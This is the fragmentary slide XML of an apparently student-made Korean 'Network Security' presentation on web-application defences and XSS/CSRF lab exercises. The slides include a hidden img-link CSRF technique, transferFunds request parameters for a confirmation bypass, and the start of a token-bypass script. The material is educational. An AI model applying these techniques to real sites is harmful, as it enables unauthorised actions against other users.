    <dgm:cxn modelId="{F648B142-33AF-44F8-A3D7-5EFC71A95E99}" type="presOf" srcId="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" destId="{CD01A8BE-3C48-420A-80E7-75C9E67665E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BAC49741-6B44-475E-80CE-F793823AF559}" type="presOf" srcId="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" destId="{179832CA-9C12-4A51-B00D-689DE2D45529}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{17667939-58C4-49FB-BEA0-9620BDA65CA3}" srcId="{3C384EDA-EB81-41E6-A186-A1B9E57404D4}" destId="{7E5DAF29-92EB-4CFB-8E7D-18108F3B9D63}" srcOrd="0" destOrd="0" parTransId="{E81F1A88-E6A9-4153-95E2-924B46DA3125}" sibTransId="{6B7F5C30-F6E3-4197-8F8A-ECFCEB0811AC}"/>
    <dgm:cxn modelId="{46110EFF-BA20-4843-8CDE-6F7D1DDF6CB8}" srcId="{8FBFA223-84D7-418F-9350-950A2F3F63CC}" destId="{0A6D8397-B7C2-4281-99B5-0B90EA71F8F5}" srcOrd="1" destOrd="0" parTransId="{91D91953-150C-4D9A-A22F-00DA58951BC2}" sibTransId="{2838DF9E-CBD8-4331-B019-771FC884E51C}"/>
    <dgm:cxn modelId="{21292FAB-8F1B-4AB1-97D7-869E20383547}" type="presOf" srcId="{23CB550E-7F12-4D01-A678-1503E37AB198}" destId="{7DD6623B-BD1C-44E1-BCF5-8B7562696477}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B4D1883C-B095-4919-BF66-8B3AF2796477}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{3846AED1-B046-4FED-A8D4-BC68CB8DDFC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08329B41-B21A-447A-91A5-401C478E95F7}" type="presParOf" srcId="{3846AED1-B046-4FED-A8D4-BC68CB8DDFC5}" destId="{DA56D732-8DF3-4618-B0B6-4338A90C2E51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{24D9D240-B7C1-4FD0-BCCB-CCB28E66358F}" type="presParOf" srcId="{3846AED1-B046-4FED-A8D4-BC68CB8DDFC5}" destId="{7DD6623B-BD1C-44E1-BCF5-8B7562696477}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8CB70014-2F4E-45A9-82A6-9D5659A1246E}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{5D515EEA-E9C3-4B5E-93F8-78E170ECB96E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{967E38EC-E561-4680-BE9C-DAB3F7F2D294}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{5981D3E9-D87A-400D-A1E8-419D734559A6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D422DB32-631F-46D0-BD3D-6B8647F25362}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{E4C086F0-EAFC-42C8-BD78-67FA07FD537F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{18387253-7113-4B46-9C6B-358910BF4C88}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{C4C75051-D970-43B2-9EEA-3B5AA71312C7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{68A61B11-5863-482E-AC21-CD1FD29A0130}" type="presParOf" srcId="{C4C75051-D970-43B2-9EEA-3B5AA71312C7}" destId="{B6ADEF42-1019-4917-9AB2-E38384489186}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FFFD4ACE-3FB8-4865-AA39-6BCBFCCB535D}" type="presParOf" srcId="{C4C75051-D970-43B2-9EEA-3B5AA71312C7}" destId="{179832CA-9C12-4A51-B00D-689DE2D45529}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{51558437-FC06-48DB-A38A-E9DBDA3F25D5}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{397467CC-F44F-4C92-832D-3784D9846588}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{515DD337-F7B8-48F4-B225-19440B45A21E}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{2965B721-39CC-4172-9FF4-64DB27EC97C8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3318D4B6-0684-4D9E-A977-F5F6B556C2D8}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{24EE4192-6646-43C9-83EB-AA48ED2ABE04}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{64A50BF7-C9A0-4363-B8EE-7072188BEFC6}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{658DE3BA-B066-4FF0-B5B3-E30AE6AA835D}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F8FC4E63-DC9F-4D77-BE87-D182F33ED246}" type="presParOf" srcId="{658DE3BA-B066-4FF0-B5B3-E30AE6AA835D}" destId="{C1873845-1937-452A-8A62-5B1BEBE5F65E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C3F0924D-280B-4C53-81B8-1201C9D615B1}" type="presParOf" srcId="{658DE3BA-B066-4FF0-B5B3-E30AE6AA835D}" destId="{07E65839-578B-43B9-A637-4B9E890CAB0B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{009E4286-206B-46AE-B2A9-65B8CD20487A}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{76A91E26-0FFD-493A-9B10-334B987D8D7B}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A9EF6C67-BF33-4530-ABBC-A9F63D634DA3}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{6A6CD2E3-40C5-4484-96DC-7EF11F01EA30}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{022E1023-77A4-4726-949E-D2F93BF90395}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{3D912BEE-BCC9-4ADA-B664-03E1D55ED1F2}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2280612F-C174-4013-B823-C9DF7099F6F8}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{8B114C21-FB59-4D25-B31C-FB2755D63560}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CC7E87D0-F4F6-48B1-8CA3-91527CC2728F}" type="presParOf" srcId="{8B114C21-FB59-4D25-B31C-FB2755D63560}" destId="{B8909F61-C0AC-4B28-8CF8-E7D215FB4460}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{FBDF8326-3C01-4383-AE59-1323FCE7536C}" type="presParOf" srcId="{8B114C21-FB59-4D25-B31C-FB2755D63560}" destId="{CD01A8BE-3C48-420A-80E7-75C9E67665E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9A5892CF-A4EF-471F-AE64-C17254FFF5AF}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{36541763-3282-4078-8A22-5919CB072CF8}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6A92EC09-E526-401D-A0C4-9705C9EC63CF}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{F6E96FB7-6D88-46B0-AFBB-B40853DBA5FA}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5972F106-C731-4C6B-98D5-E9B9048CB1CC}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{384E23EC-29B5-4E36-9760-D7C2FE59041F}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4D7456FA-0BE2-4F12-8399-984E968EB96C}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{7211C45C-6960-4259-886C-33230B014E70}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7B3D4AF3-A6B7-44C8-AC4C-04D2C05C59A7}" type="presParOf" srcId="{7211C45C-6960-4259-886C-33230B014E70}" destId="{D0E47E5F-5C88-4EBD-AD8F-8874EEAE8DFB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3CE83DAF-9383-41BD-8926-F0AE173CBA25}" type="presParOf" srcId="{7211C45C-6960-4259-886C-33230B014E70}" destId="{FD730379-AB2C-40C2-92AB-C74808517AC3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1F045D77-620B-415C-9CD8-3FF453E2DF57}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{C0009CF9-0914-4F4D-8207-0E9DB4A6240A}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C3CAED5B-772F-4DFB-8999-FA4289448310}" type="presParOf" srcId="{2F05081D-E21D-49ED-9A7A-846E3FA5A0E7}" destId="{99F4CF9B-54E1-4EA4-A118-08431576FF5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1D3E9-D87A-400D-A1E8-419D734559A6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="245930"/>
          <a:ext cx="8128000" cy="74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smtClean="0"/>
            <a:t>Input Textbox</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200" smtClean="0"/>
            <a:t>의 구문 검증 및 확인</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="245930"/>
        <a:ext cx="8128000" cy="743400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DD6623B-BD1C-44E1-BCF5-8B7562696477}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406400" y="4187"/>
          <a:ext cx="5689600" cy="4723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mtClean="0"/>
            <a:t>Validation Check</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="429457" y="27244"/>
        <a:ext cx="5643486" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2965B721-39CC-4172-9FF4-64DB27EC97C8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1311890"/>
          <a:ext cx="8128000" cy="74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smtClean="0"/>
            <a:t>SQL Query</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200" smtClean="0"/>
            <a:t>의 노출을 최소화</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1311890"/>
        <a:ext cx="8128000" cy="743400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{179832CA-9C12-4A51-B00D-689DE2D45529}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406400" y="1075730"/>
          <a:ext cx="5689600" cy="472320"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="80000"/>
            <a:hueOff val="67816"/>
            <a:satOff val="1294"/>
            <a:lumOff val="57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mtClean="0"/>
            <a:t>Stored Procedure</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="429457" y="1098787"/>
        <a:ext cx="5643486" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A6CD2E3-40C5-4484-96DC-7EF11F01EA30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2377850"/>
          <a:ext cx="8128000" cy="74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smtClean="0"/>
            <a:t>DB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200" smtClean="0"/>
            <a:t>연결계정 정보 암호화</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2377850"/>
        <a:ext cx="8128000" cy="743400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{07E65839-578B-43B9-A637-4B9E890CAB0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406400" y="2141690"/>
          <a:ext cx="5689600" cy="472320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/>
            <a:t>Encryption</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="429457" y="2164747"/>
        <a:ext cx="5643486" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F6E96FB7-6D88-46B0-AFBB-B40853DBA5FA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3443810"/>
          <a:ext cx="8128000" cy="74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smtClean="0"/>
            <a:t>DB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200" smtClean="0"/>
            <a:t>접근 계정을 제한</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3443810"/>
        <a:ext cx="8128000" cy="743400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CD01A8BE-3C48-420A-80E7-75C9E67665E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406400" y="3207650"/>
          <a:ext cx="5689600" cy="472320"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="80000"/>
            <a:hueOff val="203448"/>
            <a:satOff val="3881"/>
            <a:lumOff val="171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제한된 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="1200" smtClean="0"/>
            <a:t>DB </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200" smtClean="0"/>
            <a:t>접근계정</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="429457" y="3230707"/>
        <a:ext cx="5643486" cy="426206"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99F4CF9B-54E1-4EA4-A118-08431576FF53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4509770"/>
          <a:ext cx="8128000" cy="74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33248" rIns="630823" bIns="10668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smtClean="0"/>
            <a:t>에러발생시 최소 페이지만을 보여주어 정보 노출을 막음</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4509770"/>
        <a:ext cx="8128000" cy="743400"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FD730379-AB2C-40C2-92AB-C74808517AC3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="406400" y="4273610"/>
          <a:ext cx="5689600" cy="472320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mtClean="0"/>
            <a:t>Custom Error Page </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200" smtClean="0"/>
            <a:t>사용</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="429457" y="4296667"/>
        <a:ext cx="56434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-43542" y="-29028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05029" y="-14515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943428" y="3046367"/>
            <a:ext cx="10261602" cy="97409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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Ebrima" pitchFamily="2" charset="0"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Ebrima" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Network Security</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="6000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Ebrima" pitchFamily="2" charset="0"/>
              <a:ea typeface="나눔바른고딕" pitchFamily="50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4700" y="5820298"/>
            <a:ext cx="3661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mtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소프트웨어학부</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>20150271 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>정구익</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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Stored XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>취약점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43050" y="186360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Stored XSS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는 스크립트를 웹 서버에 저장하여 일반 게시판 등에 공격자가 게시글에 스크립트를 삽입하여 사용자가 해당 페이지를 클릭하는 순간 스크립트가 실행되도록 하는 방법이다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사용자의 입력데이터가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에 저장되고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, DB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에서 해당 값을 읽어오는 경우 발생되는 취약점이다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5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XSS  </a:t>
            </a:r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stage5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122" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP12_\x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35" y="1436618"/>
            <a:ext cx="9269065" cy="476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Reflected</a:t>
            </a:r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 XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" smtClean="0">
                <a:latin typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="나눔바른고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>취약점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43050" y="186360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Stored XSS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는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공격 스크립트가 삽입 된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URL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을 사용자가 쉽게 확인할 수 없도록 변형시킨 후 이메일이나 다른 웹 사이트 등에 클릭을 유도하도록 하는 방법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서버에 저장되지 않고 웹 브라우저를 통하여 메시지를 반환한다는 취약점을 이용한 공격 방식이다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웹 브라우저로 반환되는 메시지 값을 악의적인 내용으로 변경하여 보내면 서비스에 악영향을 미칠 수 있다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,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Cross Site Request Forgery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공격에 성공하였을 경우 해당하는 링크로 전송하기 위한 스크립트 문장입니다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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>태그로 둘러 쌓여있기 때문에 다른 사용자가 보았을 때는 아무런 문장도 보이지 않습니다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/>
              <a:t>Width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 1 or 0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 하는 이유는 다른 사용자로 하여금 눈치 채지 못하도록 최대한 작게하기 위함입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP18_\xs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25" y="1374431"/>
            <a:ext cx="6402625" cy="488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Cross Site Request Forgery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Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Trap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 건 후 게시글을 눌러 전송 데이터를 잡아 확인했을 때 네모와 같이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>&lt;img&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>둘러 쌓여 링크가 존재하고 있음을 볼 수 있습니다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링크 내부에 이미지가 없을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>XBOX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 보이게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>이를 통해 다른 사용자는 눈치 챌 수 없게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7171" name="Picture 3" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP20_\xss7-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41"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1407874" y="1466850"/>
            <a:ext cx="6402626" cy="481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19375" y="3171825"/>
            <a:ext cx="4972050" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="E5203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Cross Site Request Forgery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게시글을 누르게 되면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>부분에 입력했던 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 실행되게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="C:\Users\rndlr\AppData\Local\Temp\_AZTMP22_\xss7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6" y="1466850"/>
            <a:ext cx="6217876" cy="485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25" y="1374431"/>
            <a:ext cx="6402625" cy="488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CSRF Prompt By-Pass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Message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>입력 필드에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>CSRF Prompt By-Pass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위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 입력되어있습니다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transferFunds=5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 전송한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>transferFunds=CONFIRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>을 추가로 전송하여 검증까지 마치도록 합니다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9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CSRF Prompt By-Pass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Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 포함된 게시글을 클릭하게 되면 클릭하는 순간 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>가 실행되게 되고 과제를 성공적으로 수행하게 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>..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92" y="1374431"/>
            <a:ext cx="6285206" cy="488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5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CSRF token By-Pass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741" y="1190802"/>
            <a:ext cx="92529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/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>script&gt;function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:t>token(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
